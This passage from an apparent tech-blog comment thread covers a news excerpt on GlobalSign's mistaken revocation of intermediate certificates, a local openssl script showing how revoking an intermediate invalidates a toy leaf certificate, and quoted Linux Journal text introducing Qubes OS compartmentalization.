The result is that many websites big and small have had their HTTPS certificates incorrectly scrapped, meaning that for some people their browsers no longer trust websites and refuse or are reluctant to access them.
Specifically, it appears GlobalSign inadvertently triggered the revocation of its intermediary certificates while updating a special cross-certificate. This smashed the chain of trust and ultimately nullified SSL/TLS certificates issued by GlobalSign to its customers. It could take days to fix, leaving folks unable to easily read their favorite webpages.
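Both articles above describe the same mechanism: revoking an intermediate certificate invalidates every certificate issued beneath it, because clients that check revocation reject the chain at the intermediate. The script below is an added example, not GlobalSign's or The Register's material: it builds a toy root, intermediate and leaf with the `openssl` command-line tool, issues CRLs, verifies the leaf, then revokes the intermediate and verifies again. All names (`Toy Root CA`, `www.example.test`) and the temporary PKI layout are made up for the demonstration; it assumes `openssl` 1.1.1 or later is installed.

```shell
#!/bin/sh
# Added example: why revoking an intermediate kills every leaf under it.
# Assumes the openssl CLI; all certificate names are constructed.
set -e
WORK=$(mktemp -d)
cd "$WORK"

# Minimal CA config: a shared issuance database plus the extension sets
# for CA certificates (keyCertSign + cRLSign) and end-entity certificates.
cat > ca.cnf <<'EOF'
[ req ]
distinguished_name = dn
[ dn ]
[ ca ]
default_ca = toy_ca
[ toy_ca ]
new_certs_dir    = .
database         = index.txt
serial           = serial
crlnumber        = crlnumber
default_md       = sha256
default_days     = 30
default_crl_days = 30
policy           = loose
[ loose ]
commonName = supplied
[ v3_ca ]
basicConstraints = critical, CA:TRUE
keyUsage = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
[ v3_leaf ]
basicConstraints = CA:FALSE
EOF
touch index.txt; echo 1000 > serial; echo 01 > crlnumber

# root (self-signed) -> intermediate (signed by root) -> leaf (signed by intermediate)
openssl req -x509 -new -newkey rsa:2048 -nodes -keyout root.key -out root.crt \
  -subj "/CN=Toy Root CA" -days 30 -config ca.cnf -extensions v3_ca 2>/dev/null
openssl req -new -newkey rsa:2048 -nodes -keyout int.key -out int.csr \
  -subj "/CN=Toy Intermediate CA" -config ca.cnf 2>/dev/null
openssl ca -batch -config ca.cnf -cert root.crt -keyfile root.key \
  -in int.csr -out int.crt -extensions v3_ca >/dev/null 2>&1
openssl req -new -newkey rsa:2048 -nodes -keyout leaf.key -out leaf.csr \
  -subj "/CN=www.example.test" -config ca.cnf 2>/dev/null
openssl x509 -req -in leaf.csr -CA int.crt -CAkey int.key -CAcreateserial \
  -out leaf.crt -days 30 -extfile ca.cnf -extensions v3_leaf 2>/dev/null

# CRL issued by the intermediate: stays empty, the leaf itself is never revoked.
openssl ca -config ca.cnf -cert int.crt -keyfile int.key -gencrl -out int.crl 2>/dev/null

issue_root_crl() {
    openssl ca -config ca.cnf -cert root.crt -keyfile root.key -gencrl -out root.crl 2>/dev/null
}

# chain_status: "ok" when leaf -> intermediate -> root verifies with every
# CRL consulted (-crl_check_all), "revoked" when any link is on a CRL.
chain_status() {
    cat root.crl int.crl > all.crl
    if openssl verify -crl_check_all -CAfile root.crt -CRLfile all.crl \
         -untrusted int.crt leaf.crt >/dev/null 2>&1; then
        echo ok
    elif openssl verify -crl_check_all -CAfile root.crt -CRLfile all.crl \
         -untrusted int.crt leaf.crt 2>&1 | grep -q "certificate revoked"; then
        echo revoked
    else
        echo failed
    fi
}

issue_root_crl
BEFORE=$(chain_status)

# The GlobalSign-style mistake: the intermediate, not the leaf, is revoked,
# and the root publishes a fresh CRL saying so.
openssl ca -config ca.cnf -cert root.crt -keyfile root.key -revoke int.crt 2>/dev/null
issue_root_crl
AFTER=$(chain_status)

echo "before revoking the intermediate: $BEFORE; after: $AFTER"
```

Note that the leaf certificate and its private key never change between the two checks; the only thing that changed is a CRL entry two levels up, which is why an affected site operator could do nothing locally and had to wait for the CA to publish a corrected chain and for client caches to expire.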
Tomi Engdahl says:
Secure Desktops with Qubes: Introduction
http://www.linuxjournal.com/content/secure-desktops-qubes-introduction
This is the first in a multipart series on Qubes OS, a security-focused operating system that is fundamentally different from any other Linux desktop I’ve ever used.
When it comes to Linux security, server security tends to get the most attention. When you are hardening servers, you generally try to limit what any individual server does and use firewalls to restrict access between servers to only what is necessary. In a modern environment where a server is running only SSH plus maybe one or two other networked services, there are only a few ways for an attacker to get in. If a particular server does get hacked, ideally you can detect it, isolate that server and respond to the emergency while the rest of your environment stays up.
Desktop Linux security is a completely different challenge because of just how many different things you do with your desktop. Each action you take with your desktop computer opens up a new way to be compromised. Web browsing, especially if you still have certain risky plugins like Flash installed, is one major way a desktop can be compromised. E-mail is another popular attack vector since you need to open only one malicious e-mail attachment or click on one malicious phishing link for an attack to succeed. Linux desktops also often are used as development platforms, which means users might be downloading, building and executing someone else’s code or running services directly on their desktop to test out their own code. Although some Linux users are smug when they think about all of the malware on other platforms, the fact is that the days when Windows was the only desktop OS in town are over, and these days, much of the malware is written in a cross-platform way so that it can run on many different operating systems.
The biggest issue with desktop Linux security is what’s at risk if you do get hacked: all of your personal data. This could be anything from user names and passwords to important accounts like your bank or credit-card accounts, your social-media accounts, your domain registrar or Web sites you shopped at in the past that have your credit-card data cached.
Attackers could leave behind a Remote Access Trojan that lets them get back into your machine whenever they want, and in the meantime, they could snoop on you with your Webcam and microphone. They even could compromise your SSH, VPN and GPG keys, which opens up access to other computers.
The core idea behind how Qubes provides security is an approach called security by compartmentalization. This approach focuses on limiting the damage an attacker can do by separating your activities and their related files to separate virtual machines (VMs). You then assign each VM a certain level of trust based on the level of risk that VM presents. For instance, you may create an untrusted VM that you use for your generic, unauthenticated Web browsing. You then might have a separate, more-trusted VM that you use only to access your bank.
Secure Desktops with Qubes: Compartmentalization
http://www.linuxjournal.com/content/secure-desktops-qubes-compartmentalization?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+linuxjournalcom+%28Linux+Journal+-+The+Original+Magazine+of+the+Linux+Community%29
When you first start using Qubes, you may not be quite sure how best to divide up all of your files and activities into separate VMs.
In this article, I describe how I organize my activities into VMs on my personal computer. Although I’m not saying my approach is perfect, and I certainly could secure things even further than I do, I at least will provide you one example you can use to get started.